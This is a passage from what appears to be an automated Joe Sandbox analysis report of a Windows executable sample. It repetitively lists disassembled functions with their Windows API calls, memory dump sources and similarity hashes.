                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                Function 00405EBF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                                                                                                                                                                Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                                                                                                                                                                Function 6FDF2AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000), ref: 6FDF2BB7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 746a604a32e29519a3afe1ecae7054161731903295893cbb1287109d0e66a0d3
                                                                                                                                                                                • Instruction ID: 1e57cf8e3ece731a93be9f7334fd76afee1bf3d194d22544fe1c59885223e70a
                                                                                                                                                                                • Opcode Fuzzy Hash: 746a604a32e29519a3afe1ecae7054161731903295893cbb1287109d0e66a0d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F418271403784EFEB609F68E981F5D3774EB0632EF26C426E805CA150C735B5929BA1
                                                                                                                                                                                Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                                                                                                                                                                Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                                                                                                                                                                Function 6FDF29DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNELBASE(6FDF505C,00000004,00000040,6FDF504C), ref: 6FDF29FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                • Opcode ID: d1c9f9ea477fb4613738eb5072cc61f316acc676491786a20882d7e3f30952f7
                                                                                                                                                                                • Instruction ID: 9d6a8792725244baa83701b80d73e089065f4a1b4656b2d24ad47182c431065f
                                                                                                                                                                                • Opcode Fuzzy Hash: d1c9f9ea477fb4613738eb5072cc61f316acc676491786a20882d7e3f30952f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF092B1546A80EEEB90CF2CA444F093FE0B70A325F1AC52AE149D6240E3347169EB95
                                                                                                                                                                                Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                                                                                                                                                                • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                                                                                                                                                                Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                                                                                • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                                                                                                                                                                • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                                                                                • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                                                                                                                                                                Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                Memory Dump Source
